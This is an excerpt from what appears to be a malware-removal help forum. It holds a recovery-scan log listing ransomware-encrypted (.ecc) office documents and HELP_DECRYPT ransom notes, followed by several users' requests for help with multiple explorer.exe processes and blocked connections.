Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131112152754.pdf.ecc 2015-02-26 07:51 - 2013-11-12 15:26 - 00094756 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131112152641.pdf.ecc 2015-02-26 07:51 - 2013-11-11 14:11 - 00072596 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131111141103.pdf.ecc 2015-02-26 07:51 - 2013-11-11 12:03 - 00117604 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131111120334.pdf.ecc 2015-02-26 07:51 - 2013-11-11 11:03 - 00129140 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131111110358.pdf.ecc 2015-02-26 07:51 - 2013-11-11 11:01 - 00119204 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131111110156.pdf.ecc 2015-02-26 07:51 - 2013-11-11 10:30 - 00176724 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131111103023.pdf.ecc 2015-02-26 07:51 - 2013-11-07 15:35 - 00068548 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131107153529.pdf.ecc 2015-02-26 07:51 - 2013-11-01 07:29 - 00072276 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131101082924.pdf.ecc 2015-02-26 07:51 - 2013-10-31 13:01 - 00025204 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131031140159.pdf.ecc 2015-02-26 07:51 - 2013-10-31 12:18 - 00022276 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131031131825.pdf.ecc 2015-02-26 07:51 - 2013-10-31 10:13 - 00245780 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131031111336.pdf.ecc 2015-02-26 07:51 - 2013-10-29 11:41 - 00030324 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131029124133.pdf.ecc 2015-02-26 07:51 - 2013-10-25 07:57 - 00032212 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131025085712.pdf.ecc 2015-02-26 07:51 - 2013-10-23 11:32 - 00029604 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131023123240.pdf.ecc 2015-02-26 07:51 - 2013-10-23 09:31 - 00117844 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131023103113.pdf.ecc 2015-02-26 07:51 - 2013-10-23 09:30 - 00116068 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131023103002.pdf.ecc 2015-02-26 07:51 - 2013-10-18 07:59 - 00027620 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131018085911.pdf.ecc 2015-02-26 07:51 - 2013-10-17 10:46 - 00025172 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131017114632.pdf.ecc 2015-02-26 07:51 - 2013-10-17 10:44 - 00025060 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131017114455.pdf.ecc 2015-02-26 07:51 - 2013-10-17 10:12 - 00047956 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131017111202.pdf.ecc 2015-02-26 07:51 - 2013-10-16 08:37 - 00290868 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131016093745.pdf.ecc 2015-02-26 07:51 - 2013-10-16 08:20 - 00116132 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131016092022.pdf.ecc 2015-02-26 07:51 - 2013-10-16 08:13 - 00092388 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131016091334.pdf.ecc 2015-02-26 07:51 - 2013-10-10 13:58 - 00081620 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131010145837.pdf.ecc 2015-02-26 07:51 - 2013-10-10 13:48 - 00243028 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131010144852.pdf.ecc 2015-02-26 07:51 - 2013-10-10 13:39 - 00079524 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131010143918.pdf.ecc 2015-02-26 07:51 - 2013-10-10 13:22 - 00079204 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131010142231.pdf.ecc 2015-02-26 07:51 - 2013-10-10 13:18 - 00078772 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131010141830.pdf.ecc 2015-02-26 07:51 - 2013-10-07 15:43 - 00054548 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131007164343.pdf.ecc 2015-02-26 07:51 - 2013-10-07 13:57 - 00117092 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131007145758.pdf.ecc 2015-02-26 07:51 - 2013-10-07 08:55 - 00008100 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131007095554.pdf.ecc 2015-02-26 07:51 - 2013-10-07 07:59 - 00014948 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131007085932.pdf.ecc 2015-02-26 07:51 - 2013-10-02 07:23 - 00100932 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131002082303.pdf.ecc 2015-02-26 07:51 - 2013-10-02 07:21 - 00074020 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131002082119.pdf.ecc 2015-02-26 07:51 - 2013-09-25 09:38 - 00072084 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130925103806.pdf.ecc 2015-02-26 07:51 - 2013-09-24 15:40 - 00072724 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924164023.pdf.ecc 2015-02-26 07:51 - 2013-09-24 10:56 - 00054580 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924115606.pdf.ecc 2015-02-26 07:51 - 2013-09-24 10:48 - 00518964 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924114859.pdf.ecc 2015-02-26 07:51 - 2013-09-24 10:38 - 00194916 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924113859.pdf.ecc 2015-02-26 07:51 - 2013-09-24 10:36 - 00131940 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924113629.pdf.ecc 2015-02-26 07:51 - 2013-09-24 10:34 - 00102676 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924113404.pdf.ecc 2015-02-26 07:51 - 2013-09-24 10:32 - 00039380 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924113244.pdf.ecc 2015-02-26 07:51 - 2013-09-24 08:34 - 00038436 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924093429.pdf.ecc 2015-02-26 07:51 - 2013-09-24 08:18 - 00054116 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924091824.pdf.ecc 2015-02-26 07:51 - 2013-09-20 10:26 - 00084084 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130920112627.pdf.ecc 2015-02-26 07:51 - 2013-09-19 12:28 - 00067732 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130919132846.pdf.ecc 2015-02-26 07:51 - 2013-09-16 11:25 - 00095764 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130916122548.pdf.ecc 2015-02-26 07:51 - 2013-09-16 11:24 - 00033332 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130916122435.pdf.ecc 2015-02-26 07:51 - 2013-09-10 07:46 - 00127748 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130910084627.pdf.ecc 2015-02-26 07:51 - 2013-09-06 13:26 - 00122756 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130906142601.pdf.ecc 2015-02-26 07:51 - 2013-09-06 13:23 - 00122436 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130906142330.pdf.ecc 2015-02-26 07:51 - 2013-09-06 09:37 - 00039780 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130906103744.pdf.ecc 2015-02-26 07:51 - 2013-09-05 10:45 - 00017668 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130905114558.pdf.ecc 2015-02-26 07:51 - 2013-09-05 08:50 - 00039892 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130905095048.pdf.ecc 2015-02-26 07:51 - 2013-09-04 07:57 - 00027556 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130904085758.pdf.ecc 2015-02-26 07:51 - 2013-09-04 07:56 - 00071396 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130904085635.pdf.ecc 2015-02-26 07:51 - 2013-09-03 15:05 - 00017396 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130903160502.pdf.ecc 2015-02-26 07:51 - 2013-09-03 08:58 - 00046004 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130903095827.pdf.ecc 2015-02-26 07:51 - 2013-09-03 08:52 - 00044180 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130903095251.pdf.ecc 2015-02-26 07:51 - 2013-09-03 08:51 - 00044228 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130903095145.pdf.ecc 2015-02-26 07:51 - 2013-09-02 16:14 - 00042260 _____ () C:\Documents and Settings\Maureen\My Documents\Millikin 2nd floor draft.pdf.ecc 2015-02-26 07:51 - 2013-09-02 16:13 - 00037988 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130902171358.pdf.ecc 2015-02-26 07:51 - 2013-08-27 07:09 - 00087796 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130827080958.pdf.ecc 2015-02-26 07:51 - 2013-08-20 11:29 - 00082532 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130820122915.pdf.ecc 2015-02-26 07:51 - 2013-08-19 10:23 - 00026996 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130819112352.pdf.ecc 2015-02-26 07:51 - 2013-08-19 10:12 - 00027860 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130819111224.pdf.ecc 2015-02-26 07:51 - 2013-08-14 12:40 - 00036020 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130814134055.pdf.ecc 2015-02-26 07:51 - 2013-08-13 11:23 - 00011156 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130813122345.pdf.ecc 2015-02-26 07:51 - 2013-08-13 10:20 - 00013316 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130813112011.pdf.ecc 2015-02-26 07:51 - 2013-08-13 10:06 - 00009060 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130813110657.pdf.ecc 2015-02-26 07:51 - 2013-08-09 10:36 - 00046404 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130809113653.pdf.ecc 2015-02-26 07:51 - 2013-08-08 17:31 - 00041380 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130808183153.pdf.ecc 2015-02-26 07:51 - 2013-08-08 08:08 - 00017284 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130808090846.pdf.ecc 2015-02-26 07:51 - 2013-08-07 10:19 - 00062740 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130807111939.pdf.ecc 2015-02-26 07:51 - 2013-08-06 15:02 - 00044196 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130806160238.pdf.ecc 2015-02-26 07:51 - 2013-08-06 15:00 - 00106084 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130806160008.pdf.ecc 2015-02-26 07:51 - 2013-08-05 15:32 - 00047124 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130805163212.pdf.ecc 2015-02-26 07:51 - 2013-07-31 09:23 - 00070052 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130731102306.pdf.ecc 2015-02-26 07:51 - 2013-07-29 08:31 - 00026276 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130729093149.pdf.ecc 2015-02-26 07:51 - 2013-07-26 11:00 - 00060772 _____ () C:\Documents and Settings\Maureen\My Documents\Horace Mann PO.pdf.ecc 2015-02-26 07:51 - 2013-07-26 11:00 - 00056500 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130726120011.pdf.ecc 2015-02-26 07:51 - 2013-07-25 11:14 - 00090740 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130725121445.pdf.ecc 2015-02-26 07:51 - 2013-07-23 15:00 - 00016452 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130723160008.pdf.ecc 2015-02-26 07:51 - 2013-07-23 05:49 - 00010468 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130723064931.pdf.ecc 2015-02-26 07:51 - 2013-07-17 08:43 - 00161876 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130717094310.pdf.ecc 2015-02-26 07:51 - 2013-07-16 07:21 - 00037060 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130716082128.pdf.ecc 2015-02-26 07:51 - 2013-07-16 07:18 - 00026692 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130716081819.pdf.ecc 2015-02-26 07:51 - 2013-07-16 06:52 - 00126356 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130716075233.pdf.ecc 2015-02-26 07:51 - 2013-07-15 11:51 - 00170996 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130715125159.pdf.ecc 2015-02-26 07:50 - 2013-07-15 11:49 - 00140724 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130715124935.pdf.ecc 2015-02-26 07:50 - 2013-07-15 11:47 - 00176980 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130715124750.pdf.ecc 2015-02-26 07:50 - 2013-07-15 11:43 - 00056468 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130715124308.pdf.ecc 2015-02-26 07:50 - 2013-07-15 10:12 - 00069348 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130715111228.pdf.ecc 2015-02-26 07:50 - 2013-07-15 09:54 - 00005076 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130715105459.pdf.ecc 2015-02-26 07:50 - 2013-07-12 14:23 - 00129460 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130712152328.pdf.ecc 2015-02-25 19:34 - 2014-12-08 01:46 - 00000000 ____D () C:\Documents and Settings\NetworkService\Application Data\Adobe 2015-02-25 17:15 - 2015-01-09 14:32 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\Old Colony paint spec 2015-02-25 17:15 - 2014-12-30 14:52 - 00118276 _____ () C:\Documents and Settings\Maureen\Desktop\Old Colony Planning Council.pdf.ecc 2015-02-25 17:15 - 2014-10-30 12:15 - 00643508 _____ () C:\Documents and Settings\Maureen\Desktop\Leonard Lumber Account Info.pdf.ecc 2015-02-25 17:15 - 2014-07-18 07:33 - 00027252 _____ () C:\Documents and Settings\Maureen\Desktop\Klingspor Account Application.pdf.ecc 2015-02-25 17:15 - 2014-06-17 08:20 - 00024388 _____ () C:\Documents and Settings\Maureen\Desktop\Phone Numbers.doc.ecc 2015-02-25 17:15 - 2013-09-27 14:02 - 00083508 _____ () C:\Documents and Settings\Maureen\Desktop\Prevailing Wage Form.pdf.ecc 2015-02-25 17:15 - 2013-07-07 19:24 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\Job Clock 2015-02-25 17:15 - 2013-07-07 18:08 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\Jobclock Information 2015-02-25 17:15 - 2013-07-07 18:07 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\Workers Comp 2015-02-25 17:15 - 2013-07-07 18:07 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\Stadium Cert Payroll 2015-02-25 17:13 - 2013-07-07 18:08 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\Fax Cover Sheets 2015-02-25 17:12 - 2014-08-13 15:32 - 00677604 _____ () C:\Documents and Settings\Maureen\Desktop\APG Insurance Cert.pdf.ecc 2015-02-25 17:12 - 2014-04-22 12:36 - 00058916 _____ () C:\Documents and Settings\Maureen\Desktop\APG Insurance Certificate 2014.pdf.ecc 2015-02-25 17:12 - 2013-12-27 10:58 - 00704148 _____ () C:\Documents and Settings\Maureen\Desktop\APG Ins Cert 2013-2014.pdf.ecc 2015-02-25 17:12 - 2013-07-15 10:13 - 00073636 _____ () C:\Documents and Settings\Maureen\Desktop\APG Insurance Certificate.pdf.ecc 2015-02-25 17:12 - 2013-07-07 18:08 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\APG Info 2015-02-25 17:12 - 2013-07-07 18:07 - 11474372 _____ () C:\Documents and Settings\Maureen\Desktop\APG Letter Head.rtf.ecc 2015-02-25 17:12 - 2013-07-07 18:07 - 00182724 _____ () C:\Documents and Settings\Maureen\Desktop\Commercial Roofing License Requirements.pdf.ecc 2015-02-25 17:12 - 2013-07-07 18:07 - 00033892 _____ () C:\Documents and Settings\Maureen\Desktop\APG Resume.pdf.ecc 2015-02-25 16:59 - 2015-01-08 15:31 - 00453268 _____ () C:\Documents and Settings\Maureen\Desktop\Additional Insured-Smithfield Exchange Bank.pdf.ecc 2015-02-25 16:59 - 2013-07-07 18:10 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\ADP Payroll Sheets 2015-02-25 15:49 - 2014-12-05 23:04 - 00000000 ____D () C:\Documents and Settings\Maureen\Local Settings\Application Data\Google 2015-02-25 15:49 - 2013-07-09 09:42 - 00000000 ____D () C:\Documents and Settings\Maureen\Local Settings\Application Data\Adobe 2015-02-25 14:59 - 2013-12-05 12:51 - 00000000 ____D () C:\Documents and Settings\Maureen\Application Data\Leadertech 2015-02-25 14:59 - 2013-07-10 14:23 - 00000000 ____D () C:\Documents and Settings\Maureen\Application Data\Adobe 2015-02-25 14:58 - 2013-07-09 09:47 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\McAfee 2015-02-25 13:52 - 2014-09-10 15:33 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Hewlett-Packard 2015-02-25 13:52 - 2013-07-09 09:43 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Adobe 2015-02-25 13:40 - 2013-07-10 15:19 - 00000000 ____D () C:\Canon 2015-02-12 14:22 - 2014-04-14 16:52 - 00041616 _____ (iolo technologies, LLC) C:\WINDOWS\system32\iolobtdfg.exe 2015-02-12 14:22 - 2014-04-14 16:52 - 00023568 _____ (iolo technologies, LLC) C:\WINDOWS\system32\smrgdf.exe 2015-02-12 14:04 - 2014-04-14 16:53 - 02096960 _____ (iolo technologies, LLC) C:\WINDOWS\system32\Incinerator32.dll 2015-02-12 13:58 - 2014-04-14 16:52 - 00069016 _____ (Raxco Software, Inc.) C:\WINDOWS\system32\Drivers\PDFsFilter.sys 2015-02-11 03:13 - 2013-08-09 02:00 - 00000000 ____D () C:\WINDOWS\system32\MRT 2015-02-11 03:00 - 2013-07-07 18:36 - 113756392 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2015-02-09 08:25 - 2014-03-30 13:51 - 00000220 _____ () C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Monthly.job 2015-02-06 09:58 - 2013-07-07 18:07 - 00002483 _____ () C:\Documents and Settings\Maureen\Desktop\Microsoft Word.lnk ==================== Files in the root of some directories ======= 2015-03-05 21:34 - 2015-03-05 21:34 - 0023040 _____ () C:\Documents and Settings\Maureen\Application Data\07 With Ice, Anent The Steam.mp3 2015-02-25 14:59 - 2015-02-25 14:59 - 0008604 _____ () C:\Documents and Settings\Maureen\Application Data\HELP_DECRYPT.HTML 2015-02-25 14:59 - 2015-02-25 14:59 - 0045854 _____ () C:\Documents and Settings\Maureen\Application Data\HELP_DECRYPT.PNG 2015-02-25 14:59 - 2015-02-25 14:59 - 0000288 _____ () C:\Documents and Settings\Maureen\Application Data\HELP_DECRYPT.URL 2015-02-25 13:57 - 2015-02-25 13:57 - 0000636 _____ () C:\Documents and Settings\Maureen\Application Data\key.dat 2015-02-25 13:57 - 2015-02-26 08:23 - 66112650 _____ () C:\Documents and Settings\Maureen\Application Data\log.html 2015-03-06 18:16 - 2015-03-06 18:16 - 0001324 _____ () C:\Documents and Settings\Maureen\Local Settings\Application Data\d3d9caps.tmp 2015-02-25 19:19 - 2015-02-25 19:19 - 0008604 _____ () C:\Documents and Settings\Maureen\Local Settings\Application Data\HELP_DECRYPT.HTML 2015-02-25 19:19 - 2015-02-25 19:19 - 0045854 _____ () C:\Documents and Settings\Maureen\Local Settings\Application Data\HELP_DECRYPT.PNG 2015-02-25 19:19 - 2015-02-25 19:19 - 0000288 _____ () C:\Documents and Settings\Maureen\Local Settings\Application Data\HELP_DECRYPT.URL 2015-02-25 14:58 - 2015-02-25 14:58 - 0008604 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.HTML 2015-02-25 14:58 - 2015-02-25 14:58 - 0045854 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.PNG 2015-02-25 14:58 - 2015-02-25 14:58 - 0000288 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.URL Files to move or delete: ==================== C:\Windows\Tasks\At1.job C:\Windows\Tasks\At2.job C:\Windows\Tasks\At3.job C:\Windows\Tasks\At4.job ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\WINDOWS\explorer.exe => File is digitally signed C:\WINDOWS\system32\winlogon.exe => File is digitally signed C:\WINDOWS\system32\svchost.exe => File is digitally signed C:\WINDOWS\system32\services.exe => File is digitally signed C:\WINDOWS\system32\User32.dll => File is digitally signed C:\WINDOWS\system32\userinit.exe => File is digitally signed C:\WINDOWS\system32\rpcss.dll => File is digitally signed C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed ==================== End Of Log ============================
  14. Hello, few days ago I've discovered multiple explorer.exe processes. The main one is using 20-40mb of memory and the rest of them are using ~10mb of memory. I have my system protected by NIS 2014 for more than a year and didn't see any anomalies like this before. I scanned my WIn7 Pro with x64 Farbar Recovery Scan Tool (see attachments). I've also scanned my system with Malwarebytes Anti-Malware and Anti-Rootkit software but they didn't find anything suspicious. I've killed smaller ones (5) about an hour ago and only the main one is running ever since. I don't really know when did they started. Do you guys have any suggestions? FRST.txt Addition.txt
  15. I seem to be having problems with windows/explorer.exe. The symptoms are multiple instances of explorer.exe running with one of the instances using a majority of my RAM and CPU. Per instructions on your forum, I have installed and run Farbar Recovery Scan Tool. Attached are the two logs. Also per instructions I have uninstalled Skype. So far I have run the following (not necessarily in the order listed): TDSSKiller ComboFix adwcleaner Junk Removal Tool iolo Kapersky avast CCleaner Some of these found issues and claimed to have resolved them. I'm currently using Avast and Malwarebytes. They are blocking malware (outbound IP's from explorer.exe), but I've spent hours trying to get whatever this malware is off, to no avail. Any help is greatly appreciated!!! Addition.txt FRST.txt
  16. My problem is very insidious, and also very weird. As soon as I connect to the internet, my CPU is flooded by multiple instances of ctfmon.exe, about 17 to 20 instances in the Task Manager. They appear only for a moment before disappearing again, but then multiples instances of explorer.exe (the Windows Explorer, not Internet Explorer) pop up, using anywhere from 25% to 60% of my CPU. Sometimes, even multiple instances of dllhost.exe pop into the Task Manager as well. At this point, my malware removal and prevention steps have taken me through running in Safe Mode and running Malwarebytes Anti-Malware, Spybot - Search and Destroy, and even Windows Malware Removal Tool. These programs find no infected files, and say the computer is clean. Doing research has been hell. I have to continually disable and enable my network adaptor to keep from being overrun, but I have succeeded somewhat. A lot of the forums I have looked at say this is a rootkit issue; one person even started deleting registry keys (I have absolutely no intention of playing that type of Russian Roulette). I saw an entry here, linked at http://forums.malwarebytes.org/index.php?/topic/140963-multiple-instances-of-explorerexe-in-task-manager/, and the solution went very far, but the user stopped responding near the end, and thus the topic was closed. Instead of just blindly following that topic, I have decided to post here myself to find out what should be done in my case. Any assistance would be appreciated. My smartphone is currently unaffected, so I will be receiving e-mail updates by following my thread on here, and I will turn my adaptor back on to receive instructions and continue to debug this issue. Thank you very much for your time.
  17. Hello, I installed Malwarebytes recently, did a scan, removed all the suspicious things but very often a window pops up with the following information: "Malicious website blocked Domain: IP: 194.165.0.3 Port: 6881 Type: inbound Process: C:\windows\explorer.exe " I don't know whether or not it's a virus, any help how to resolve this issue is very much appreciated. Thanks
  18. I think i got infected on Friday 14th. A windows dialogue box appeared to install a genuine looking file, I clicked on OK to install it before Malwarebytes intercepted it. Ever since then it keeps displaying: "Malicious website blocked Domain: IP: 194.165.0.3 Port: 6881 Type: inbound Process: C:\windows\explorer.exe " and "Malicious website blocked Domain: IP: 79.35.131.29 Port: 6881 Type: outbound Process: C:\windows\explorer.exe " I tried the usual scans with Avast Internet Security, Malwarebytes Premium, Windows Defender and System Restore but no luck and nothing found. System is now running slow with something take up a lot of RAM I cant reformat as I have nowhere to backup data. (There is no bit-torrent on the system, it has been uninstalled) (The logs are attached) FRST.txt Addition.txt
  19. Have contracted rootkit malware, noticed when multiple incidences of explorer and dllhost were running and explorer.exe tried to access internet (blocked by Malwarebytes). Per instructions elsewhere I have downloaded and run FRST.EXE and also Roguekiller. The FRST.TXT and ADDITION.TXT from FRST and the RKreport from Roguekiller are copied below. I downloaded and ran the premium version of Malwarebytes which found several instances of threats which I quarantined. Malwarebytes log also attached. Other than that, I have made no deletions or changes to anything. Hope I am doing this right. Thanks much in advance for any help. Only other request would be: do you know how to track down the individuals responsible for this stuff? Thanks, PirateSteve FRST.txt Addition.txt RKreport_SCN_11042014_191751.log Malwarebytes Scan Log.txt
  20. I am not able to detect malware of any kind with my AV/malware scans or malware bytes even with chameleon and yet windows explorer continually crashes when I access the file delete or edit /cut/paste edit menu. also when I attempt to delete files beneath recycle bin in left menu of "my computer" window. Also, My cable repair man had gone to youtube through my computer to test the connection speed after he repaired my cable box, he clicked a video on youtube that was a double-click add( adclick.g.doubleclclick.net/aclk?))he then left before I realized it was a youtube tracking add that I learned from other forums could be both a virus, a trojan and/or a malware and also has IP addressscan ability.(adclick.g) When I checked later my "Spybot" had caught it, but only to have it return when I used "hitman PRO" I caught it once, thought it was gone, then ran it again later and it caught it again. Primarily concerned with the explorer.exe crash when managing and editing my files on my computer's local hard disks. I do appologize for my previous post topic which also had my "Kaspersy" issue added. That was quickly and promptly explained by one of your agents as a non-issue. I cannot edit the topic to omit this detail I do not know the proper procedure but have reposted this and it is on topic with my immediate problem, The windows explorer crash and I am wanting to determine if adclick.g is sill present on my PC hidden or not? please disregard that one posted at 8:25 PM(central time) and answer this one, thank you! Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 03-09-2014 02Ran by Matthew Daubenspeck (administrator) on MDAUB113886 on 04-09-2014 20:06:43Running from D:\Google Chrome DownloadsPlatform: Windows 7 Ultimate Service Pack 1 (X64) OS Language: English (United States)Internet Explorer Version 11Boot Mode: Normal The only official download link for FRST:Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ Download link from any site other than Bleeping Computer is unpermitted or outdated.See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe(Creative Technology Ltd) C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe(Microsoft Corporation) C:\Windows\System32\wlanext.exe(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe(SUPERAntiSpyware.com) D:\Program Files\SUPERAntiSpyware\SASCore64.exe(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe(Creative Technology Ltd) C:\Windows\SysWOW64\CtHdaSvc.exe(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe(Malwarebytes Corporation) D:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe(Malwarebytes Corporation) D:\Program 